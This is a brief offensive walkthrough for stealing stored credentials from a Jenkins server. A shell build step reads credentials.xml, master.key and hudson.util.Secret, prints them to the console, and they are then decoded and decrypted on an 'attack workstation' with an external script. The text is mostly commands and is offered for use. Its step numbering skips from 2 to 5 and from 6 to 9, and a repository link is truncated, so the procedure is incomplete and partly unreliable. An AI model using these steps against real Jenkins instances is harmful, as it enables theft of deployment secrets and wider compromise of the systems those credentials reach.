STEP 1: Log into Jenkins server build user:
https://<Jenkins_IP>/script/
STEP 2: Follow:
New Item -> Freeform Build
“New Project”-> Configure -> General -> Restrict Where This Is Run -> Enter “Master” -> Build -> Add Build Step -> Execute Shell
echo ""
echo "credentials.xml"
cat ${JENKINS_HOME}/credentials.xml
echo ""
echo "master.key"
cat ${JENKINS_HOME}/secrets/master.key | base64 -w 0
echo ""
echo "hudson.util.Secret"
cat ${JENKINS_HOME}/secrets/hudson.util.Secret | base64 -w 0
STEP 5: Navigate to “Build History” and click on your build job number. Then click “Console Output”
STEP 6: Copy text of “credentials.xml” & place into local file on your attack workstation named “credentials.xml”
echo <base64 string master.key> | base64 --decode > master.key
echo <base64 string hudson.util.Secret> | base64 --decode > hudson.util.Secret
github.com/tweksteen/jenk…
STEP 9: Decrypt the “credentials.xml” file using “master.key” and “hudson.util.Secret”:
decrypt.py <master.key> <hudson.util.Secret> <credentials.xml>